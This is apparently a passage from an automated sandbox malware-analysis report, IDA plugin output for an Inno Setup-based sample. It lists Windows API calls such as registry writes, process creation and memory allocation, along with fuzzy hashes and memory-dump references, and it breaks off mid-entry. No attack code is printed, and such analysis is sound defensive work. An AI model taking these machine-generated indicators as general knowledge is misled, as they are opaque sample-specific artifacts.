                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion
                                                                            • API String ID: 47109696-1019749484
                                                                            • Opcode ID: 6e2d5090e95b4c6fabdd9168d7cad944b3593745ae6ad0b3bb6d2af319e0c910
                                                                            • Instruction ID: 70811ca8e083c9a3dbfae153db117623eb743e792d78c4ccda021ebaf15ccddc
                                                                            • Opcode Fuzzy Hash: 6e2d5090e95b4c6fabdd9168d7cad944b3593745ae6ad0b3bb6d2af319e0c910
                                                                            • Instruction Fuzzy Hash: 8EF08931B0411467DA00A5DA5C82B9E56DD8B55758F20407FF508EB253D9B99D02036C
                                                                            APIs
                                                                            • RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,004763FA,?,0049C1D0,?,0046F403,?,00000000,0046F99E,?,_is1), ref: 0046F10F
                                                                            Strings
                                                                            • Inno Setup: Setup Version, xrefs: 0046F10D
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Value
                                                                            • String ID: Inno Setup: Setup Version
                                                                            • API String ID: 3702945584-4166306022
                                                                            • Opcode ID: 734ac0f1c1098741eb0e60cbf617dbc9041c5452899e61f021b18629f5aca0fc
                                                                            • Instruction ID: 253732d940e31991125f8b939195b5ca02eb4333684dc2ddbbcc15e62aa31341
                                                                            • Opcode Fuzzy Hash: 734ac0f1c1098741eb0e60cbf617dbc9041c5452899e61f021b18629f5aca0fc
                                                                            • Instruction Fuzzy Hash: 3BE06D713012047FD710AA6B9C85F5BBADDDF993A5F10403AB908DB392D578DD4081A8
                                                                            APIs
                                                                            • RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F7DA,?,?,00000000,0046F99E,?,_is1,?), ref: 0046F16F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Value
                                                                            • String ID: NoModify
                                                                            • API String ID: 3702945584-1699962838
                                                                            • Opcode ID: 14b653d2795b3180ab09acf432715bdcca8a399851f75d04a8bb0bb30e96b91c
                                                                            • Instruction ID: dfbc78ba79a393f528aadc4bccb3a1e1d52346a2df28baf9fde3d1272b39f611
                                                                            • Opcode Fuzzy Hash: 14b653d2795b3180ab09acf432715bdcca8a399851f75d04a8bb0bb30e96b91c
                                                                            • Instruction Fuzzy Hash: D8E04FB4604304BFEB04DB55DD4AF6B77ECDB48750F10415ABA04DB281E674EE00C668
                                                                            APIs
                                                                            • GetACP.KERNEL32(?,?,00000001,00000000,0047E25F,?,-0000001A,004800D8,-00000010,?,00000004,0000001B,00000000,00480425,?,0045DECC), ref: 0047DFF6
                                                                              • Part of subcall function 0042E32C: 7427A570.USER32(00000000,00000000,0048048C,?,?,00000001,00000000,00000002,00000000,00480D8E,?,?,?,?,?,004986AB), ref: 0042E33B
                                                                              • Part of subcall function 0042E32C: EnumFontsA.GDI32(?,00000000,0042E318,00000000,00000000,0042E384,?,00000000,00000000,0048048C,?,?,00000001,00000000,00000002,00000000), ref: 0042E366
                                                                              • Part of subcall function 0042E32C: 7427A480.USER32(00000000,?,0042E38B,00000000,00000000,0042E384,?,00000000,00000000,0048048C,?,?,00000001,00000000,00000002,00000000), ref: 0042E37E
                                                                            • SendNotifyMessageA.USER32(00010408,00000496,00002711,-00000001), ref: 0047E1C6
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: 7427$A480A570EnumFontsMessageNotifySend
                                                                            • String ID:
                                                                            • API String ID: 2520092367-0
                                                                            • Opcode ID: d5a98fd350b21412a22cf4123539bd0c298e95acb479fbe192b8033f652af546
                                                                            • Instruction ID: 0ea8e5e95b90053dcc80dc26f94e29a170662e2b3e10ca2db4d961c35622b213
                                                                            • Opcode Fuzzy Hash: d5a98fd350b21412a22cf4123539bd0c298e95acb479fbe192b8033f652af546
                                                                            • Instruction Fuzzy Hash: 2651A6746001508BD710FF27D9C16963799EB88308B90C6BBA8089F367C77CDD068B9D
                                                                            APIs
                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0042DD48), ref: 0042DC4C
                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,70000000,?,?,00000000,?,00000000,?,00000000,0042DD48), ref: 0042DCBC
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: QueryValue
                                                                            • String ID:
                                                                            • API String ID: 3660427363-0
                                                                            • Opcode ID: dcaea444aa2693f3151e4f161b8541bd325653ac2cf38fab622dd52302d9ecee
                                                                            • Instruction ID: 0afc69acb925fd444515a6cbe8b6240f093bd173affdd4b5aabebdcedbe93bcc
                                                                            • Opcode Fuzzy Hash: dcaea444aa2693f3151e4f161b8541bd325653ac2cf38fab622dd52302d9ecee
                                                                            • Instruction Fuzzy Hash: E0414F71E00529ABDB11DF95D881BAFB7B8AB00714F90846AE800F7241D778AE00CBA9
                                                                            APIs
                                                                            • RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DFE6,?,?,00000008,00000000,00000000,0042E013), ref: 0042DF7C
                                                                            • RegCloseKey.ADVAPI32(?,0042DFED,?,00000000,00000000,00000000,00000000,00000000,0042DFE6,?,?,00000008,00000000,00000000,0042E013), ref: 0042DFE0
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CloseEnum
                                                                            • String ID:
                                                                            • API String ID: 2818636725-0
                                                                            • Opcode ID: 18687f4e18b3232f9437fac6e5314fb2332009eed5616211d6a140e10b5cd508
                                                                            • Instruction ID: 2fe76ac110d60e281b9c8dcd8425dafac1d5c60e45ccd2ae84570cbaedcb928d
                                                                            • Opcode Fuzzy Hash: 18687f4e18b3232f9437fac6e5314fb2332009eed5616211d6a140e10b5cd508
                                                                            • Instruction Fuzzy Hash: 52319170F04258AEDB11DFA2DD82BAEB7B9EB48304F91407BE501E7281D6785A01CA2D
                                                                            APIs
                                                                            • CreateProcessA.KERNEL32(00000000,00000000,?,?,004580B4,00000000,0045809C,?,?,?,00000000,0045284E,?,?,?,00000001), ref: 00452828
                                                                            • GetLastError.KERNEL32(00000000,00000000,?,?,004580B4,00000000,0045809C,?,?,?,00000000,0045284E,?,?,?,00000001), ref: 00452830
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CreateErrorLastProcess
                                                                            • String ID:
                                                                            • API String ID: 2919029540-0
                                                                            • Opcode ID: 256024ef10b7bad05e9cca563efcf05eafb457725b2bcd1ab333216967b323f1
                                                                            • Instruction ID: 3ad6dec6d32dc5e6ab031f6e5884ad9a987dc2d9ff381773f4694f698bcb58b9
                                                                            • Opcode Fuzzy Hash: 256024ef10b7bad05e9cca563efcf05eafb457725b2bcd1ab333216967b323f1
                                                                            • Instruction Fuzzy Hash: D3117972600208AF8B00DEADDD41DABB7ECEB4E310B10456BFD08E3201D678AE148BA4
                                                                            APIs
                                                                            • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040AFF2
                                                                            • FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040B14F,00000000,0040B167,?,?,?,00000000), ref: 0040B003
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Resource$FindFree
                                                                            • String ID:
                                                                            • API String ID: 4097029671-0
                                                                            • Opcode ID: 020963cbed5d1efe29b5c6b0b84e3d8c20ff6c1b4cf1f3711bef16ed23147c41
                                                                            • Instruction ID: 22447e907da962d806d3eb032de74b702d5affa043e15eb070a4a3d902aeafed
                                                                            • Opcode Fuzzy Hash: 020963cbed5d1efe29b5c6b0b84e3d8c20ff6c1b4cf1f3711bef16ed23147c41
                                                                            • Instruction Fuzzy Hash: 0001DF71300604AFD710FF69DC92E1B77A9DB8A718711807AF500AB7D0DA79AC0096AD
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 0041EF03
                                                                            • 74285940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042EEC0,?,00000001), ref: 0041EF09
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: 74285940CurrentThread
                                                                            • String ID:
                                                                            • API String ID: 3444323889-0
                                                                            • Opcode ID: 4f622a916fb84fb1e9f1f3e222a7611e51385d213cb7cd19795c9b5a33aefee2
                                                                            • Instruction ID: 3b2ca51acea6f31c20bceb620234c512699c69eae89bb1383ecfa3b3ac64bed2
                                                                            • Opcode Fuzzy Hash: 4f622a916fb84fb1e9f1f3e222a7611e51385d213cb7cd19795c9b5a33aefee2
                                                                            • Instruction Fuzzy Hash: FD013976A04604BFDB06CF6BDC1195ABBE9E789720B22887BEC04D36A0E6355810DE18
                                                                            APIs
                                                                            • MoveFileA.KERNEL32(00000000,00000000), ref: 00452CAE
                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,00452CD4), ref: 00452CB6
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFileLastMove
                                                                            • String ID:
                                                                            • API String ID: 55378915-0
                                                                            • Opcode ID: 4a87794495b209091e638427933314290125c3fb15c22ae1653921e41cb98622
                                                                            • Instruction ID: 8cb4f6990e07c72a34a39c3d349ee9eec810a974928c7dd1f8c60ebce1e721cc
                                                                            • Opcode Fuzzy Hash: 4a87794495b209091e638427933314290125c3fb15c22ae1653921e41cb98622
                                                                            • Instruction Fuzzy Hash: D5014971B00204BB8B11DF799D414AEB7ECEB4A32531045BBFC08E3243EAB84E048558
                                                                            APIs
                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,004527BB), ref: 00452795
                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,004527BB), ref: 0045279D
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CreateDirectoryErrorLast
                                                                            • String ID:
                                                                            • API String ID: 1375471231-0
                                                                            • Opcode ID: 638905229d0ae290751701005a3127306b10a627987a4e9871fe20b3b513e6c4
                                                                            • Instruction ID: 7517b5081c7c6af98826394809c6fe2d976c468da5ddf52a6f68070703836f12
                                                                            • Opcode Fuzzy Hash: 638905229d0ae290751701005a3127306b10a627987a4e9871fe20b3b513e6c4
                                                                            • Instruction Fuzzy Hash: 40F0FC71A04704AFCF00DF759D4199EB7E8DB0E715B5049B7FC14E3242E7B94E1485A8
                                                                            APIs
                                                                            • LoadCursorA.USER32(00000000,00007F00), ref: 00423259
                                                                            • LoadCursorA.USER32(00000000,00000000), ref: 00423283
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CursorLoad
                                                                            • String ID:
                                                                            • API String ID: 3238433803-0
                                                                            • Opcode ID: 57390d314a1cb7161e6ddc30cf2ec12f57c29d9a020bc84e90da4252d8f033e1
                                                                            • Instruction ID: c8375b04fab070422f53c3d6524130e38f027298e82d6ab835706982cf041ecc
                                                                            • Opcode Fuzzy Hash: 57390d314a1cb7161e6ddc30cf2ec12f57c29d9a020bc84e90da4252d8f033e1
                                                                            • Instruction Fuzzy Hash: 0FF0A711704114AADA105D7E6CC0E2B7268DB91B36B6103BBFA3AD72D1C62E1D41457D
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00008000), ref: 0042E3AE
                                                                            • LoadLibraryA.KERNEL32(00000000,00000000,0042E3F8,?,00000000,0042E416,?,00008000), ref: 0042E3DD
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLibraryLoadMode
                                                                            • String ID:
                                                                            • API String ID: 2987862817-0
                                                                            • Opcode ID: 7795cc8daa252176d65de3d8f3118caac988bfa791d53a68a28aad838e50b78c
                                                                            • Instruction ID: 98bcbcc3e9aaf4c66058534b39987ccdd7eb12bd14468eaf88ad72af9e5505e3
                                                                            • Opcode Fuzzy Hash: 7795cc8daa252176d65de3d8f3118caac988bfa791d53a68a28aad838e50b78c
                                                                            • Instruction Fuzzy Hash: D5F05E70A14744BEDF119F779C6282ABAACE749B1179248B6F810A3691E67D48108928
                                                                            APIs
                                                                            • GetClassInfoA.USER32(00400000,?,?), ref: 004162F1
                                                                            • GetClassInfoA.USER32(00000000,?,?), ref: 00416301
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: ClassInfo
                                                                            • String ID:
                                                                            • API String ID: 3534257612-0
                                                                            • Opcode ID: 0cefddb0d68ec1ee3d6e09aa9ac37d408dcb608ad702880eba3eeb66fdb88c2a
                                                                            • Instruction ID: dc9e2acc6f173dd0cc3aa24d84b637cb0067f0ccc6b7cec6a0fcec59befe77f5
                                                                            • Opcode Fuzzy Hash: 0cefddb0d68ec1ee3d6e09aa9ac37d408dcb608ad702880eba3eeb66fdb88c2a
                                                                            • Instruction Fuzzy Hash: 22E012B26015155ADB10DB999D81EE326DCDB09310B110167BE14CA246D764DD005BA4
                                                                            APIs
                                                                            • SetFilePointer.KERNEL32(?,00000000,?,00000002,?,?,004703F1,?,00000000), ref: 004508FA
                                                                            • GetLastError.KERNEL32(?,00000000,?,00000002,?,?,004703F1,?,00000000), ref: 00450902
                                                                              • Part of subcall function 004506A0: GetLastError.KERNEL32(004504BC,00450762,?,00000000,?,004977FC,00000001,00000000,00000002,00000000,0049795D,?,?,00000005,00000000,00497991), ref: 004506A3
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$FilePointer
                                                                            • String ID:
                                                                            • API String ID: 1156039329-0
                                                                            • Opcode ID: 740b0e3b535324eeb3a184350110131e2b1ae31ce216053ff26069d2cbf9fe72
                                                                            • Instruction ID: a22a311b57bf1dff13f45894218d9c0eaf9de3d8271a2984ee0ce7717fd7efee
                                                                            • Opcode Fuzzy Hash: 740b0e3b535324eeb3a184350110131e2b1ae31ce216053ff26069d2cbf9fe72
                                                                            • Instruction Fuzzy Hash: E0E012B53042059BFB00FA6599C1F3B63DCDB44315F00447AB984CF187D674CC155B29
                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual$AllocFree
                                                                            • String ID:
                                                                            • API String ID: 2087232378-0
                                                                            • Opcode ID: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
                                                                            • Instruction ID: 119661fe7174a079321c86e78af40791ac039b5eb8373b45468023a5ba433726
                                                                            • Opcode Fuzzy Hash: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
                                                                            • Instruction Fuzzy Hash: F7F08272A0063067EB60596A4C81B5359859BC5B94F154076FD09FF3E9D6B58C0142A9
                                                                            APIs
                                                                            • GetSystemDefaultLCID.KERNEL32(00000000,0040871A), ref: 00408603
                                                                              • Part of subcall function 00406DF4: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406E11
                                                                              • Part of subcall function 00408570: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: DefaultInfoLoadLocaleStringSystem
                                                                            • String ID:
                                                                            • API String ID: 1658689577-0
                                                                            • Opcode ID: 2ab4847006ef9acfce6ccb5f1f64a91e8b74d27154e4f0e7901e4566ca639e1f
                                                                            • Instruction ID: ea6634d2ed8774f5e90a5a6f355d63bed973dafba18e0ec7d48b30ffe24ea089
                                                                            • Opcode Fuzzy Hash: 2ab4847006ef9acfce6ccb5f1f64a91e8b74d27154e4f0e7901e4566ca639e1f
                                                                            • Instruction Fuzzy Hash: C4314375E001199BCF01DF95C8819EEB7B9FF84314F15857BE815AB286E738AE018B98
                                                                            APIs
                                                                            • SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FC49
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: InfoScroll
